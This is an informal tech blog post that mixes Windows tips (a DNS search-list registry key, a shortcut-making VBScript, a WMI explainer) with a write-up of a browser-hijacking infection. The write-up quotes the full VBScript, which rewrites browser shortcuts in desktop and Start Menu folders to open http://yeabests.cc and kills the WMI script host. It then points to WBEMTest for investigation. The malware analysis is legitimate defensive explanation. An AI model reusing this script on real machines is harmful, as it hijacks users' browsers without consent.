How many times have you attempted to search across multiple domains and cannot find them. Well here is the easy way to set them.
Your welcome
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters]
“SearchList”=”mikedopp.com,JoeLevi.com,google.com”
First you have to create a small text file by the name mkshortcut.vbs. Use your favorite text editor to edit the file, even notepad will do. Then copy the following text and paste it into the file:
set WshShell = WScript.CreateObject(“WScript.Shell” )
set oShellLink = WshShell.CreateShortcut(Wscript.Arguments.Named(“shortcut”) & “.lnk”)
oShellLink.TargetPath = Wscript.Arguments.Named(“target”)
oShellLink.WindowStyle = 1
oShellLink.Save
Then save the file and exit the editor. Make sure that you move the file in a directory in your PATH (usually C:WINDOWS\System32 is fine). Now, from the command line you can create shortcuts this way:
mkshortcut /target:TargetName /shortcut:c:\users\<you>\desktop\ShortcutName
You will have to replace TargetName with the name of the target file and ShortcutName with the name of the shortcut to be created (do not include a .lnk extension!). For example:
C:>mkshortcut /target:”c:/documents and settings/<you>/desktop” /shortcut:”My Desktop”
Ok that sounds all sorts of wrong or confusing.
“Windows Management Instrumentation (WMI) is the Microsoft implementation of Web-Based Enterprise Management (WBEM), which is an industry initiative to develop a standard technology for accessing management information in an enterprise environment.” Credit
Still sounds a little like WTFunction?
Well think of WMI as a database for objects within windows.
Ok now we are done with that.
CODE in a VB script for infection (run in browser)
Dim objFS Set objFS = CreateObject("Scripting.FileSystemObject") On Error Resume Next Const link = "http://yeabests.cc" browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe") Set BrowserDic = CreateObject("scripting.dictionary") For Each browser In browsers BrowserDic.Add LCase(browser), browser Next Dim FoldersDic(12) Set WshShell = CreateObject("Wscript.Shell") FoldersDic(0) = "C:\Users\Public\Desktop" FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu" FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs" FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" FoldersDic(4) = "C:\Users\User\Desktop" FoldersDic(5) = "C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu" FoldersDic(6) = "C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs" FoldersDic(7) = "C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" FoldersDic(8) = "C:\Users\User\AppData\Roaming\Roaming" FoldersDic(9) = "C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch" FoldersDic(10) = "C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu" FoldersDic(11) = "C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar" Set fso = CreateObject("Scripting.Filesystemobject") For i = 0 To UBound(FoldersDic) For Each file In fso.GetFolder(FoldersDic(i)).Files If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then set oShellLink = WshShell.CreateShortcut(file.Path) path = oShellLink.TargetPath name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path) If BrowserDic.Exists(LCase(name)) Then oShellLink.Arguments = link If file.Attributes And 1 Then file.Attributes = file.Attributes - 1 End If oShellLink.Save End If End If Next Next createobject("wscript.shell").run "cmd /c taskkill /f /im scrcons.exe", 0
So what the heck? that is great code but how does this work or why?
Go to a website that has been compromised. Has a tiny little jscript or vbscript that runs in your browser.
In the code lifted from the source article shows the shortcut target adding an extra web site at the end thus making you go to a certain site because the shortcut is being told to.
starting WBEMTest we need to run it with administrator privileges. To do this, right click on the C:\Windows\System32\wbemtest.exe executable and then select Run as Administrator. WBEMTest will now start.
This will help you to evaluate WMI infection that is spreading to your shortcuts.
This is nothing new but looks like its the next wave of spyware/hijackers to be concerned with.
